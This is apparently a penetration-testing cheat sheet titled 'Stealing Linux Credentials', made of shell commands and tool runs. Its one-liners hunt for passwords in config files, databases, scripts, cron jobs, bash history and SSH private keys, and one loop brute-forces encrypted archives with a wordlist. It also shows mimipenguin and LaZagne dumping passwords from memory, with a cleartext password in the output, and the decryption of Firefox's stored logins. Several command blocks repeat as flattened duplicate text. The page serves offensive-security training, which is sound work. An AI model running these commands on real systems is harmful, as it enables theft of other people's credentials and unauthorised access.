Stealing Linux Credentials

Files

History

Memory

Key-Rings

Configs

Logs

Cache

Browser stored credentials

Databases

Command-line History

In-memory Processing

Notes

Scripts

Source codes

Cronjobs

SSH Keys

# Configuration Files
Intrusionz3r0X@htb[/htb]$ for l in $(echo ".conf .config .cnf");do echo -e "\\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "lib\\|fonts\\|share\\|core" ;done

#Credentials in Configuration Files
Intrusionz3r0X@htb[/htb]$ for i in $(find / -name *.cnf 2>/dev/null | grep -v "doc\\|lib");do echo -e "\\nFile: " $i; grep "user\\|password\\|pass" $i 2>/dev/null | grep -v "\\#";done

#Databases
Intrusionz3r0X@htb[/htb]$ for l in $(echo ".sql .db .*db .db*");do echo -e "\\nDB File extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\\|lib\\|headers\\|share\\|man";done

#Notes
Intrusionz3r0X@htb[/htb]$ find /home/* -type f -name "*.txt" -o ! -name "*.*" 2>/dev/null

#Scripts
Intrusionz3r0X@htb[/htb]$ for l in $(echo ".py .pyc .pl .go .jar .c .sh");do echo -e "\\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\\|lib\\|headers\\|share";done

#Files
Intrusionz3r0X@htb[/htb]$  for ext in $(echo ".xls .xls* .xltx .csv .od* .doc .doc* .pdf .pot .pot* .pp*");do echo -e "\\nFile extension: " $ext; find / -name *$ext 2>/dev/null | grep -v "lib\\|fonts\\|share\\|core" ;done

# Credentials in cronjobs
Intrusionz3r0X@htb[/htb]$ ls -la /etc/cron.*/

#Create a list of extension (Ex. Compressed files )
Intrusionz3r0X@htb[/htb]$ curl -s <https://fileinfo.com/filetypes/compressed> | html2text | awk '{print tolower($1)}' | grep "\\." | tee -a compressed_ext.txt

#Cracking OpenSSL Encrypted Archives
Intrusionz3r0X@htb[/htb]$ for i in $(cat rockyou.txt);do openssl enc -aes-256-cbc -d -in GZIP.gzip -k $i 2>/dev/null| tar xz;done

#Finf private keys
Intrusionz3r0X@htb[/htb]$ grep -rnw "PRIVATE KEY" /home/* 2>/dev/null | grep ":1"
Intrusionz3r0X@htb[/htb]$ grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1"

#Public Keys
Intrusionz3r0X@htb[/htb]$ grep -rnw "ssh-rsa" /home/* 2>/dev/null | grep ":1"

#Find sensitive information in files with nomenclature bash
Intrusionz3r0X@htb[/htb]$ tail -n5 /home/*/.bash*

#Find Creds
find /path/to/search -type f -name "*.conf" -o -name "*.env" | xargs grep -Ei "password|pass|secret|key|token" 2>/dev/null

Important logs to check

Log File

Description

/var/log/messages

Generic system activity logs.

/var/log/syslog

Generic system activity logs.

/var/log/auth.log

(Debian) All authentication related logs.

/var/log/secure

(RedHat/CentOS) All authentication related logs.

/var/log/boot.log

Booting information.

/var/log/dmesg

Hardware and drivers related information and logs.

/var/log/kern.log

Kernel related warnings, errors and logs.

/var/log/faillog

Failed login attempts.

/var/log/cron

Information related to cron jobs.

/var/log/mail.log

All mail server related logs.

/var/log/httpd

All Apache related logs.

/var/log/mysqld.log

All MySQL server related logs.

Intrusionz3r0X@htb[/htb]$ for i in $(ls /var/log/* 2>/dev/null);do GREP=$(grep "accepted\\|session opened\\|session closed\\|failure\\|failed\\|ssh\\|password changed\\|new user\\|delete user\\|sudo\\|COMMAND\\=\\|logs" $i 2>/dev/null); if [[ $GREP ]];then echo -e "\\n#### Log file: " $i; grep "accepted\\|session opened\\|session closed\\|failure\\|failed\\|ssh\\|password changed\\|new user\\|delete user\\|sudo\\|COMMAND\\=\\|logs" $i 2>/dev/null;fi;done

Intrusionz3r0X@htb[/htb]$ sudo python3 mimipenguin.py
[sudo] password for Intrusionz3r0X: 

[SYSTEM - GNOME]	Intrusionz3r0X:WLpAEXFa0SbqOHY

Intrusionz3r0X@htb[/htb]$ sudo bash mimipenguin.sh 
[sudo] password for Intrusionz3r0X: 

MimiPenguin Results:
[SYSTEM - GNOME]          Intrusionz3r0X:WLpAEXFa0SbqOHY

Memory - LaZagne

Intrusionz3r0X@htb[/htb]$ sudo python2.7 laZagne.py all

Intrusionz3r0X@htb[/htb]$ python3 laZagne.py browsers

Firefox Stored Credentials

#Identify the folders
cry0l1t3@unixclient:~$ ls -l .mozilla/firefox/ | grep default

#See the sensitive file
cry0l1t3@unixclient:~$ cat .mozilla/firefox/1bplpd86.default-release/logins.json | jq .  

Intrusionz3r0X@htb[/htb]$ python3.9 firefox_decrypt.py

PreviousLinux Enumeration NextCritical Vulnerabilities

Last updated 5 months ago

# Configuration Files Intrusionz3r0X@htb[/htb]$ for l in $(echo ".conf .config .cnf");do echo -e "\\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "lib\\|fonts\\|share\\|core" ;done #Credentials in Configuration Files Intrusionz3r0X@htb[/htb]$ for i in $(find / -name *.cnf 2>/dev/null | grep -v "doc\\|lib");do echo -e "\\nFile: " $i; grep "user\\|password\\|pass" $i 2>/dev/null | grep -v "\\#";done #Databases Intrusionz3r0X@htb[/htb]$ for l in $(echo ".sql .db .*db .db*");do echo -e "\\nDB File extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\\|lib\\|headers\\|share\\|man";done #Notes Intrusionz3r0X@htb[/htb]$ find /home/* -type f -name "*.txt" -o ! -name "*.*" 2>/dev/null #Scripts Intrusionz3r0X@htb[/htb]$ for l in $(echo ".py .pyc .pl .go .jar .c .sh");do echo -e "\\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\\|lib\\|headers\\|share";done #Files Intrusionz3r0X@htb[/htb]$ for ext in $(echo ".xls .xls* .xltx .csv .od* .doc .doc* .pdf .pot .pot* .pp*");do echo -e "\\nFile extension: " $ext; find / -name *$ext 2>/dev/null | grep -v "lib\\|fonts\\|share\\|core" ;done # Credentials in cronjobs Intrusionz3r0X@htb[/htb]$ ls -la /etc/cron.*/ #Create a list of extension (Ex. Compressed files ) Intrusionz3r0X@htb[/htb]$ curl -s <https://fileinfo.com/filetypes/compressed> | html2text | awk '{print tolower($1)}' | grep "\\." | tee -a compressed_ext.txt #Cracking OpenSSL Encrypted Archives Intrusionz3r0X@htb[/htb]$ for i in $(cat rockyou.txt);do openssl enc -aes-256-cbc -d -in GZIP.gzip -k $i 2>/dev/null| tar xz;done #Finf private keys Intrusionz3r0X@htb[/htb]$ grep -rnw "PRIVATE KEY" /home/* 2>/dev/null | grep ":1" Intrusionz3r0X@htb[/htb]$ grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1" #Public Keys Intrusionz3r0X@htb[/htb]$ grep -rnw "ssh-rsa" /home/* 2>/dev/null | grep ":1" #Find sensitive information in files with nomenclature bash Intrusionz3r0X@htb[/htb]$ tail -n5 /home/*/.bash* #Find Creds find /path/to/search -type f -name "*.conf" -o -name "*.env" | xargs grep -Ei "password|pass|secret|key|token" 2>/dev/null

Intrusionz3r0X@htb[/htb]$ for i in $(ls /var/log/* 2>/dev/null);do GREP=$(grep "accepted\\|session opened\\|session closed\\|failure\\|failed\\|ssh\\|password changed\\|new user\\|delete user\\|sudo\\|COMMAND\\=\\|logs" $i 2>/dev/null); if [[ $GREP ]];then echo -e "\\n#### Log file: " $i; grep "accepted\\|session opened\\|session closed\\|failure\\|failed\\|ssh\\|password changed\\|new user\\|delete user\\|sudo\\|COMMAND\\=\\|logs" $i 2>/dev/null;fi;done

Intrusionz3r0X@htb[/htb]$ sudo python3 mimipenguin.py [sudo] password for Intrusionz3r0X: [SYSTEM - GNOME] Intrusionz3r0X:WLpAEXFa0SbqOHY Intrusionz3r0X@htb[/htb]$ sudo bash mimipenguin.sh [sudo] password for Intrusionz3r0X: MimiPenguin Results: [SYSTEM - GNOME] Intrusionz3r0X:WLpAEXFa0SbqOHY

#Identify the folders cry0l1t3@unixclient:~$ ls -l .mozilla/firefox/ | grep default #See the sensitive file cry0l1t3@unixclient:~$ cat .mozilla/firefox/1bplpd86.default-release/logins.json | jq . Intrusionz3r0X@htb[/htb]$ python3.9 firefox_decrypt.py

Important logs to check

Dump login passwords - Mimipenguin.

Memory - LaZagne

Firefox Stored Credentials

Important logs to check

Dump login passwords - Mimipenguin.

Memory - LaZagne

Firefox Stored Credentials